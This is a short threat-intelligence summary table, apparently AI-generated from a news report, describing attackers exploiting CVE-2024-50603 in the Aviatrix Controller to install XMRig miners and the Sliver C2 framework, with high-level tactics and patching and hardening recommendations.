| Section | Details |
|---|---|
| Threat Actors | Unknown threat actors |
| Campaign Overview | Exploitation of CVE-2024-50603 in Aviatrix Controller to deploy backdoors and cryptocurrency miners. |
| Target Regions (Victims) | Cloud enterprise environments with Aviatrix Controller, particularly those deployed in AWS environments |
| Methodology | • Attackers exploit CVE-2024-50603 to gain remote code execution. • Use of cryptocurrency miners (XMRig) and the Sliver C2 framework for persistence and follow-on exploitation. |
| Product Targeted | Aviatrix Controller cloud networking platform |
| Malware Reference | XMRig (cryptocurrency miner), Sliver C2 framework |
| Tools Used | • XMRig (cryptocurrency mining) • Sliver C2 framework |
| Vulnerabilities Exploited | CVE-2024-50603 (unauthenticated remote code execution due to improper input sanitization) |
| TTPs | • Exploiting API endpoints to inject OS commands. • Lateral movement towards administrative cloud control plane permissions. • Privilege escalation in cloud environments. |
| Attribution | Unknown |
| Recommendations | • Apply patches immediately. • Prevent public access to Aviatrix Controller. • Hardening configurations and following best practices. |
| Source | The Hackers News |
Read full article: https://thehackernews.com/2025/01/hackers-exploit-aviatrix-controller.html
The above summary has been generated by an AI language model
Leave a Reply